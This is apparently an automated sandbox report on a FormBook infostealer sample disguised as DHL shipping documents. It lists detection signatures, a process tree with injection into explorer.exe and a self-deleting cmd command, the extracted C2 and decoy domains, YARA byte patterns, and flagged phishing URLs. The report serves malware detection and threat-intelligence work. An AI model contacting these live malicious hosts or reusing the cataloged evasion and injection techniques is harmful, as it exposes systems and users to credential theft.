Edit tour

Windows Analysis Report
DHL_Shipping_Documents.exe

Overview

General Information

Sample Name:	DHL_Shipping_Documents.exe
Analysis ID:	1307663
MD5:	7581c03582cb6d3bb72e1e11af6bd9b0
SHA1:	c2682c9660609d8ba714ca96f3b87f282e7b0a6b
SHA256:	b799c685d108001c9d05b2faf48f4a1c0832067c7925c5f90258d224425e2faf
Tags:	DHLexeFormbook
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

Yara detected AntiVM3

Antivirus detection for URL or domain

Snort IDS alert for network traffic

Sample uses process hollowing technique

Maps a DLL or memory area into another process

Initial sample is a PE file and has a suspicious name

Machine Learning detection for sample

Modifies the prolog of user mode functions (user mode inline hooks)

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

.NET source code contains method to dynamically call methods (often used by packers)

Queues an APC in another process (thread injection)

Tries to detect virtualization through RDTSC time measurements

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Found decision node followed by non-executed suspicious APIs

Queries the volume information (name, serial number etc) of a device

Yara signature match

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

HTTP GET or POST without a user agent

Contains functionality for execution timing, often used to detect debuggers

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Sample file is different than original file name gathered from version info

Contains functionality to read the PEB

Checks if the current process is being debugged

Binary contains a suspicious time stamp

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

DHL_Shipping_Documents.exe (PID: 4496 cmdline: C:\Users\user\Desktop\DHL_Shipping_Documents.exe MD5: 7581C03582CB6D3BB72E1E11AF6BD9B0)

DHL_Shipping_Documents.exe (PID: 1360 cmdline: C:\Users\user\Desktop\DHL_Shipping_Documents.exe MD5: 7581C03582CB6D3BB72E1E11AF6BD9B0)

explorer.exe (PID: 4884 cmdline: C:\Windows\Explorer.EXE MD5: DDB206DDECAF3B327A418B262EE33468)

explorer.exe (PID: 2504 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6F5D250EAEDE1D80806ECBC487C7B9B8)

cmd.exe (PID: 364 cmdline: /c del "C:\Users\user\Desktop\DHL_Shipping_Documents.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 2596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 86191D9E0E30631DB3E78E4645804358)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/ https://asec.ahnlab.com/en/32149/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.withscreamandsugar.com/cy12/"], "decoy": ["routinelywell.com", "traderinformation.com", "xv1lz.cfd", "elfiensclinic.com", "dfwtexasmilitaryagent.com", "gb3p8a.com", "ofcure.com", "kslgd.link", "apexassisthubs.com", "270hg.com", "spacovitta.com", "mattress-info-hu-kwu.today", "jakestarrbroadcast.com", "modestswimwearshop.com", "game0814.com", "gec.tokyo", "growwellnesscoaching.com", "thefavoreats.com", "gaasmantech.net", "mloffers.net", "sarahklimekrealty.com", "fnykl2.com", "nuomingjs.com", "thewanderingbarfly.com", "affiliatebrokers.cloud", "yourdesignneed.com", "360expantion.com", "burumakansatunikki.com", "hh870.bio", "com-safe.site", "ssongg4134.cfd", "juntocrecemosalinstante.top", "poorexcuses.com", "stargear.top", "ktobr.live", "s5266m.com", "paragon-cto.net", "luohuigroup.com", "srspicture.com", "jounce.space", "otrnton.top", "jhaganjr.com", "eshebrown.com", "mc-ibit.com", "rundlestreetkenttown.net", "ssongg3132.cfd", "thedivorcelawyer.website", "ipcontrolsas.com", "ungravity.dev", "vigne.tattoo", "modcoops.com", "earthbondproperty.com", "pachinko-and-slot.tokyo", "pp88money.com", "mysweettangrine.com", "barbieinterviews.com", "aimageabove.com", "hamidconstruction.com", "xcolpuj.xyz", "xxxvedio.online", "ceracasas.com", "mariaelamine.com", "eew.lat", "pmugly.top"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.3440559555.00000000030C0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.3440559555.00000000030C0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.3440559555.00000000030C0000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000004.00000002.3440559555.00000000030C0000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.3440559555.00000000030C0000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.3441334701.00000000035F0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.3441334701.00000000035F0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.3441334701.00000000035F0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000004.00000002.3441334701.00000000035F0000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.3441334701.00000000035F0000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.3441040603.00000000034B0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.3441040603.00000000034B0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.3441040603.00000000034B0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000004.00000002.3441040603.00000000034B0000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.3441040603.00000000034B0000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.3461422392.000000000E916000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_772cc62d	unknown	unknown	0xa42:$a2: pass 0xa48:$a3: email 0xa4f:$a4: login 0xa56:$a5: signin 0xa67:$a6: persistent 0xc3a:$r1: C:\Users\user\AppData\Roaming\971QC9UA\971log.ini
00000002.00000002.1038021088.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.1038021088.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1038021088.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000002.00000002.1038021088.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.1038021088.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.993591273.000000000419E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.993591273.000000000419E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.993591273.000000000419E000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0xe17b9:$a1: 3C 30 50 4F 53 54 74 09 40 0x10fbd9:$a1: 3C 30 50 4F 53 54 74 09 40 0x13cff9:$a1: 3C 30 50 4F 53 54 74 09 40 0xf8128:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x126548:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x153968:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xe5f37:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x114357:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x141777:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0xf0e1f:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x11f23f:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x14c65f:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000000.00000002.993591273.000000000419E000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0xe4e70:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xe50ea:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x113290:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x11350a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1406b0:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14092a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xf0c1d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x11f03d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14c45d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xf0709:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x11eb29:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14bf49:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xf0d1f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x11f13f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14c55f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xf0e97:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x11f2b7:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x14c6d7:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xe5b02:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x113f22:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x141342:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
00000000.00000002.993591273.000000000419E000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0xf3db1:$sqlite3step: 68 34 1C 7B E1 0xf3ec4:$sqlite3step: 68 34 1C 7B E1 0x1221d1:$sqlite3step: 68 34 1C 7B E1 0x1222e4:$sqlite3step: 68 34 1C 7B E1 0x14f5f1:$sqlite3step: 68 34 1C 7B E1 0x14f704:$sqlite3step: 68 34 1C 7B E1 0xf3de0:$sqlite3text: 68 38 2A 90 C5 0xf3f05:$sqlite3text: 68 38 2A 90 C5 0x122200:$sqlite3text: 68 38 2A 90 C5 0x122325:$sqlite3text: 68 38 2A 90 C5 0x14f620:$sqlite3text: 68 38 2A 90 C5 0x14f745:$sqlite3text: 68 38 2A 90 C5 0xf3df3:$sqlite3blob: 68 53 D8 7F 8C 0xf3f1b:$sqlite3blob: 68 53 D8 7F 8C 0x122213:$sqlite3blob: 68 53 D8 7F 8C 0x12233b:$sqlite3blob: 68 53 D8 7F 8C 0x14f633:$sqlite3blob: 68 53 D8 7F 8C 0x14f75b:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: DHL_Shipping_Documents.exe PID: 4496	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: DHL_Shipping_Documents.exe PID: 4496	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x62840:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: DHL_Shipping_Documents.exe PID: 1360	Windows_Trojan_Formbook_1112e116	unknown	unknown	0xb7d69:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: explorer.exe PID: 2504	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x9d098:$a1: 3C 30 50 4F 53 54 74 09 40 0xd64ea:$a1: 3C 30 50 4F 53 54 74 09 40 0x1745b9:$a1: 3C 30 50 4F 53 54 74 09 40
Click to see the 25 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.DHL_Shipping_Documents.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
2.2.DHL_Shipping_Documents.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.DHL_Shipping_Documents.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
2.2.DHL_Shipping_Documents.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.DHL_Shipping_Documents.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
2.2.DHL_Shipping_Documents.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
2.2.DHL_Shipping_Documents.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.DHL_Shipping_Documents.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5451:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bdc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9bcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14ab7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
2.2.DHL_Shipping_Documents.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.DHL_Shipping_Documents.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a49:$sqlite3step: 68 34 1C 7B E1 0x17b5c:$sqlite3step: 68 34 1C 7B E1 0x17a78:$sqlite3text: 68 38 2A 90 C5 0x17b9d:$sqlite3text: 68 38 2A 90 C5 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 5 entries

Snort Signatures

ET TROJAN Windows executable base64 encoded - Source IP: 194.180.49.211 - Destination IP: 192.168.2.3

Timestamp:	194.180.49.211192.168.2.380497132018856 09/14/23-13:34:29.889496
SID:	2018856
Source Port:	80
Destination Port:	49713
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000004.00000002.3440559555.00000000030C0000.00000040.80000000.00040000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.withscreamandsugar.com/cy12/"], "decoy": ["routinelywell.com", "traderinformation.com", "xv1lz.cfd", "elfiensclinic.com", "dfwtexasmilitaryagent.com", "gb3p8a.com", "ofcure.com", "kslgd.link", "apexassisthubs.com", "270hg.com", "spacovitta.com", "mattress-info-hu-kwu.today", "jakestarrbroadcast.com", "modestswimwearshop.com", "game0814.com", "gec.tokyo", "growwellnesscoaching.com", "thefavoreats.com", "gaasmantech.net", "mloffers.net", "sarahklimekrealty.com", "fnykl2.com", "nuomingjs.com", "thewanderingbarfly.com", "affiliatebrokers.cloud", "yourdesignneed.com", "360expantion.com", "burumakansatunikki.com", "hh870.bio", "com-safe.site", "ssongg4134.cfd", "juntocrecemosalinstante.top", "poorexcuses.com", "stargear.top", "ktobr.live", "s5266m.com", "paragon-cto.net", "luohuigroup.com", "srspicture.com", "jounce.space", "otrnton.top", "jhaganjr.com", "eshebrown.com", "mc-ibit.com", "rundlestreetkenttown.net", "ssongg3132.cfd", "thedivorcelawyer.website", "ipcontrolsas.com", "ungravity.dev", "vigne.tattoo", "modcoops.com", "earthbondproperty.com", "pachinko-and-slot.tokyo", "pp88money.com", "mysweettangrine.com", "barbieinterviews.com", "aimageabove.com", "hamidconstruction.com", "xcolpuj.xyz", "xxxvedio.online", "ceracasas.com", "mariaelamine.com", "eew.lat", "pmugly.top"]}

Multi AV Scanner detection for submitted file

Source: DHL_Shipping_Documents.exe	ReversingLabs: Detection: 36%
Source: DHL_Shipping_Documents.exe	Virustotal: Detection: 50%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 2.2.DHL_Shipping_Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.DHL_Shipping_Documents.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3440559555.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3441334701.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3441040603.00000000034B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1038021088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.993591273.000000000419E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Antivirus detection for URL or domain

Source: http://www.withscreamandsugar.com/cy12/www.thedivorcelawyer.website	Avira URL Cloud: Label: malware
Source: http://www.com-safe.site/cy12/	Avira URL Cloud: Label: phishing
Source: http://www.pmugly.top/cy12/	Avira URL Cloud: Label: phishing
Source: http://www.xcolpuj.xyz/cy12/	Avira URL Cloud: Label: phishing
Source: http://www.withscreamandsugar.com/cy12/	Avira URL Cloud: Label: malware
Source: www.withscreamandsugar.com/cy12/	Avira URL Cloud: Label: malware
Source: http://www.com-safe.site/cy12/www.elfiensclinic.com	Avira URL Cloud: Label: phishing
Source: http://www.com-safe.site/cy12/?AvCxnt=BBvyp039BsiOmjXcA5Ca/67av2dim7wwRTlzlMYtyQde9IIm1L0K7Q1DYQ9I6Egj/rZO&ofut_l=u6Ap0tUPWV20	Avira URL Cloud: Label: phishing
Source: http://www.pmugly.top/cy12/www.jhaganjr.com	Avira URL Cloud: Label: phishing
Source: http://www.pmugly.top/cy12/?AvCxnt=8ffpABDRKHDHAf13ISyYk2Bezqt16eZbRMX7TrFKwtVzHuBqZwyD4rylxhwg/kMizB1s&ofut_l=u6Ap0tUPWV20	Avira URL Cloud: Label: phishing
Source: http://www.xcolpuj.xyz/cy12/www.xv1lz.cfd	Avira URL Cloud: Label: phishing

Machine Learning detection for sample

Source: DHL_Shipping_Documents.exe

Joe Sandbox ML: detected

Source: DHL_Shipping_Documents.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: DHL_Shipping_Documents.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: explorer.pdbUGP source: DHL_Shipping_Documents.exe, 00000002.00000002.1039297463.0000000003170000.00000040.10000000.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.3437321702.0000000000560000.00000040.80000000.00040000.00000000.sdmp
